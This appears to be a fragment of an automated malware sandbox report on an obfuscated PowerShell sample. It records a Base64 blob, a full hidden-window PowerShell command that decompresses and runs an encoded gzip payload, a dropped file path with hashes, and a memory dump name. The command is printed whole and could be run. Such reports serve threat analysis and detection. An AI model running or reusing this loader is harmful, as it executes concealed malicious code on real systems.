ARgAxADkAcgBxADUASQByAGcAdABwAEQAOQBlAGIAVwBoAGIAVwBaAHcANABnAC8AZgA3AEwAdwBBAHcATQBLAGkAMAArACcAJwArACcAJwA0AEoANABSAGUANQByAE8ASgBsAHkAewAwAH0AQwA1AGoANQBDAEkAZgBGAHkAeQBpAHIAUAAzAFEAJwAnACsAJwAnAHAAZQBVAG4AeABBAHAASgBTAEwAOQBTAEIARQBSAGMANAAyAHMARwA5AGkAaQBnAFAARQBCAGMAeQBDAEgARAArAHAATgBVAFAAQwBIADMAVwBOAGwARgBBAGYAeAA3AG8ASABOADUAdABBAFYASABEAHAAewAxAH0AbwAvAEIASABHADkATwBrAGQAdABSAEYANABlAEEAMwB2AEUAYgAyAEYAcABZAFEAcQBMAGcAWABEAHAATABqAG4AMwB1AFgAWAB5AEQAawBOAHkAZwBLAEUAbQBLADAAaQBDAEYAewAwAH0AUABXAEsAawBvADAAUgB4AFgANQBSADAAcQBPAEUAWgBGAHQAewAxAH0AeQB0AGwAaABLAGoAKwBGADIAMAAwAHAASgB4ADUASwBlAEcANQB1AHIAdgA0AE4AegBzAHgAdABnADAAVQBKAGoAMQBNAFAANwBoAFUAZwBHAE4AbwBiADcAQgBGAEUAQgBTAEoARgB5AFMASQArAE4AdgBhADIASwBEAEoASAA5AC8ASwB6AGUARABRAFEAcABaAEEALwBZAE8AawBCADcAZwBOAFcAQgBBADQAMgBGACcAJwArACcAJwAyAHkAJwAnACsAJwAnAEoASQBWAEoAZwBoAGwAcQB5AE0AVwArAEgARwA0AHAARABrAEQAagBVAGoAJwAnACsAJwAnAFIAWgBGAEEAVgBTAEoATABFAGMATwA1AEUASQBCADkAdQBVAFgAdwBzAHcAegAnACcAKwAnACcANABVAGgANwBnAFUAcwBPAHkARQBtAFEAYwBOAGsAMgBaAGIAdwBvAE8AUwB7ADAAfQBtAFUASQBVAEUAeABnAGQAKwAvAFkAOABnAGYAaQA0AC8AaAAyAGcAYQBNAGMANwB1AFIAcwBrAHsAMAB9AGIARwBiAHMAdQBVAGkAQgBnAGoAOQBvAEMAWQA1AG0AQQBCACcAJwArACcAJwAzAGcAaQBEAGwAQQAwAFkAcABaAGEASwBBAEUAbgA5AGUAUABoAFUAWgA1AHAALwBYAEoAUQBJAGMAeABNAFMAMgBiAFkARwBkAE4ASwB1ADAAdAAvAEwAcgB3AEcANQBrAGYALwBTAC8AWABqAE8AKwAvAG0ASgBiAFcAOQBSAHIASgA0AEsAcgAxAFMAUwBmAGIAWQBPAHQAOQB7ADEAfQB1AG0AZQBmACsAMwBqAEMAOQB1AHAAYwA3AHYAWgA1AG8AMgBCAGIAdAAyAFEAcwBsAEYAZgBlAFUAWgA1AEsATwBhAFYASQBDAEQAbABZAEQATABTAHIAZQBIAEsAbwArAFYAQgBNACsAegAwADIAcwBsAE8AMgAxAHAAdQAxAHoATwBOAFAANwBiAFYAQgBKAGgAYQByADEAdgBqAHMAbAB7ADEAfQByADEAZgB1ADEAOABoAHIAUQBtADQARABlAFcAdgBkADcASQAnACcAKwAnACcAZABuAHUATwBqAEMASABpAHQAcgB2AEcATwAzAEUASwBMAGQAcAA4ADcAcAB4AHUAMwBDAHIAcgBhAGwATABMAGEAMwBlAFcAaQAxAGQAbAB0AGoAbgBFADEAUAB7ADAAfQB0AEEAcwBmAG0AZAAyADkAcgBoAHYATQByADMAWAAzADQAOABvAHQARwAxAHAAZQBhAEcAaQBhAGsAMQA3AHIAQgBoAHgAdgBzADIAdgBkADMAcQBCAEcAcQBLAE8AdABxAFYAVgBjADEAbgBFAGQAawAyAGcAdQBNADEAQgB3AHoAYwA0AEQAYgBWAGsAZgBhAEEAewAxAH0AdAAnACcAKwAnACcAQgBnADMAOQBlAG0AYwBRAFAATAAxAHYAdABxAFoAagAxAE8AMABzAGUAdABXAGwAVgBwAG0ATQBkAGIAUAB1AGYAQgBBADQATwBWAFYAUwBPAHgALwBlAGcAVQB0AG4AagBLAHgAaAAwAG4AOQB2AGEAUgBVAEgAdwA5AHgASgBoAHsAMQB9ADQAbABiAE8AdABvAFoAYgBLAG0ARQBHADUAYgBjAEcAeAA3AGEAewAxAH0AUQBYAHEAWABXAHoAOQBjAHoAeAAzAGUASQBMAGQAWQB7ADAAfQBkAHUATgAvAFMAagByAEwAQgByAGUAdQBBADMAewAxACcAJwArACcAJwB9AHEAMwBXAG0AbwBYAHIAdgBsAGUATgA5ADUAMwBKAGsAawBWAHIAUQAxADIAaQBMAHcAMQB2AGQAZQB2AFYAcABOAE4AYQAwAEIAaABmAHoAaQBxAE0AdAAyAGgAdgB7ADAAfQBIAFMATwA5AE8AOQBzAEQARQBaADEASABXAHIAYgB1AGwAZQBkADcATwBMAHgAcAB2AHQAeAA0AGMAdABSADkAYwB1AEMAbwB5AGgAZABqAEgAewAxAH0ALwBBAHsAMQB9ADQAJwAnACsAJwAnAE0AUgB1AFIAaQBOAGUAcQA4ADAASwA0AEYAdQBYAHoANwBaAHYAQwB3ADUAMgArAHsAMAB9AFUANABZADgAbABKAC8AewAxAH0ASwBJADQAVwBTAEUASwB6AEkARwAnACcAKwAnACcAewAxAH0AbgArAGQAdgBpADgAVwB0AHIASgBJAFAARwBCAEUAYQBpAGcASwBQAGcAagBXAE8ASQAwAHkAaABpADAASwBmAHoAVwBtAHYAVQA4AG8AOAAwAFUAaABFAHgAWQBjAGUAZAB1AHcAcwBvAHQARwBOADIAbwBlAFEAbgBwAHUAcAAwAHEATwAnACcAKwAnACcAZwArAHQAUgBlADgAcQBYAEwAeQB5AG0ARQBDAEcAawBFAEgAQwAnACcAKwAnACcAOQAxAGMAQgB7ADAAfQB3AFYAJwAnACsAJwAnAGIARwA4AHEANQBYAEwAMABCAGIASwB1ADMATAA5AGsARABDAHYAUAAxAGUARABiAGYAYQBLAHMARgBVAFUAZgBlAFUASQB7ADAAfQBHAGEAYwBIAG8AeQBEAFAAYgBLAFUAJwAnACsAJwAnAEYATwBWAFgAUQB3AFgAUABCAHcANQBWADcARQBXACcAJwArACcAJwB3AFgAcwBJAE4ASABLACsAaAB7ADEAfQBrAEEAUgBQAEoAWQBDAGcAWgA3AEIARwBEADMARgBMAGoALwBXAEkAeABGAE8AcwBBAFAAUQBLAG4ARAB5AG0AWABnADUAQQBFAEYAQQAvAHcAegBmAFMAdwBVAHUAbQB1AHAAcABrAHkANQA0AHcAYQA4AGsAewAwAH0ARgBiAE4AVgB2AEQAbgAvAHcAdABoAG4AdABiACsAWQBmAGQAVgBKAEMAbwBYAE0AMgBSACsAVwB2ADkAeAA0AGEAUQB7ADAAfQAvAEQASQBBAFgARQBRADQAeQBOAGwAUQBsAFMAawArAHYAaABPAGUAeABTAEgATABrAFoAUABMADkAUQBKAEkAZwBHAFUAMgB4AFAATwA1AG4ALwBLAHoASABqAHoARwBEAGwAMwBoAEwALwArAHEAZABKAEsANABDAHcAQQBBACcAJwApAC0AZgAnACcAVAAnACcALAAnACcANgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAFk312UCA7VWa2/aSB{0}9Xqn/waqQ'+'bKsE82raRKq0NoaYlFdisHkUrQZ7MBPGHmKPA2y3/33vgJ3QbbKbXakjIcYz9zVnzr13lmnkccIiKZxK39{1}+kbIxQDEKJaUQkaAoF{0}yLfWiq{0}7sFhqeLkfRZUmb{1}ZmOyEJFofnnZSOMYR/z4XbrCXE8SHC4owYmiSn9K7grH+Ky/uMMel75Jhd9LV5QtEM3E9g3krbB0pke+2OswD4nISvaGEq7IX7/K{1}uysMi8171NEE0W29wnHYcmnVFal7{1}pwONxvsCJ3iRezhC15ySVRrVoaRQla4h5Ye8BdzFfM{0}2Q4zdN5Ysz{0}OMqO'+'JewcpRQZpoOYebrvxzhJ5KI0Ex5m8/lvyixzf5tGnIS41I44jtnGxvE'+'D8XBSslDkU3yLl3PQsnlMomCuqiD2wNYYgE0pLUr/xYzSw9scvNcqKadKIDXgsVqEa33uoF3mpxQfVeVnIhVcUGE88gEg/C5QXOYU8nD7GQ49LeRjdtjBELMyYAk5{1}H{1}WykWpC84RZ/EePgvDOMXq/BFxqbBvF19rq5IrgtpD9ebWhbWZw4g/f7LwAwMKi0+'+'4J4Re5rOJly{0}C5j5CIfFyyirP3Q'+'peUnxApJSL9SBERc42sG9iigPEBcyCHD+pNUPCH3WNlFAfx7oHN5tAVHDp{1}o/BHG9OkdtRF4eA3vEb2FpYQqLgXDpLjn3uXXyDkNygKEmK0iCF{0}PWKko0RxX5R0qOEZFt{1}ytlhKj+F200pJx5KeG5urv4Nzsxtg0UJj1MP7hUgGNob7BFEBSJFySI+Nva2KDJH9/KzeDQQpZA/YOkB7gNWBA42F'+'2y'+'JIVJghlqyMW+HG4pDkDjUj'+'RZFAVSJLEcO5EIB9uUXwswz'+'4Uh7gUsOyEmQcNk2ZbwoOS{0}mUIUExgd+/Y8gfi4/h2gaMc7uRsk{0}bGbsuUiBgj9oCY5mAB'+'3giDlA0YpZaKAEn9ePhUZ5p/XJQIcxMS2bYGdNKu0t/LrwG5kf/S/XjO+/mJbW9RrJ4Kr1SSfbYOt9{1}umef+3jC9upc7vZ5o2Bbt2QslFfeUZ5KOaVICDlYDLSreHKo+VBM+z02slO21pu1zONP7bVBJhar1vjsl{1}r1fu18hrQm4DeWvd7I'+'dnuOjCHitrvGO3EKLdp87pxu3CrralLLa3eWi1dltjnE1P{0}tAsfmd29rhvMr3X348otG1peaGiak17rBhxvs2vd3qBGqKOtqVVc1nEdk2guM1Bwzc4DbVkfaA{1}t'+'Bg39emcQPL1vtqZj1O0setWlVpmMdbPufBA4OVVSOx/egUtnjKxh0n9vaRUHw9xJh{1}4lbOtoZbKmEG5bcGx7a{1}QXqXWz9czx3eILdY{0}duN/SjrLBreuA3{1'+'}q3WmoXrvleN953JkkVrQ12iLw1vdevVpNNa0BhfziqMt2hv{0}HSO9O9sDEZ1HWrbuled7OLxpvtx4ctR9cuCoyhdjH{1}/A{1}4'+'MRuRiNeq80K4FuXz7ZvCw52+{0}U4Y8lJ/{1}KI4WSEKzIG'+'{1}n+dvi8WtrJIPGBEaigKPgjWOI0yhi0KfzWmvU8o80UhExYceduwsotGN2oeQnpup0qO'+'g+tRe8qXLyymECGkEHC'+'91cB{0}wV'+'bG8q5XL0BbKu3L9kDCvP1eDbfaKsFUUfeUI{0}GacHoyDPbKU'+'FOVXQwXPBw5V7EW'+'wXsINHK+h{1}kARPJYCgZ7BGD3FLj/WIxFOsAPQKnDymXg5AEFA/wzfSwUumuppky54wa8k{0}FbNVvDn/wthntb+YfdVJCoXM2R+Wv9x4aQ{0}/DIAXEQ4yNlQlSk+vhOexSHLkZPL9QJIgGU2xPO5n/KzHjzGDl3hL/+qdJK4CwAA')-f'T','6')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 7a8eb010c13820db4fd18fb66bf7a195
SHA1 cd813f5b359334ca284921bd33c770a3bef2721e
SHA256 13e0b4614ecaf6bda41b6e04ca9bcfe01172cfb21b06d34d128292d5434647df
SHA512 4d7a4a1629a61bd8f54f8e3e8b8c9873b4276cc23e839e2c83ed009fa66e09c58f340dd678d8cdf8d0aa1069f8c9b1b9f19c39b522df6b615f47d9fc3557e01c

memory/2908-7-0x0000000005040000-0x0000000005041000-memory.dmp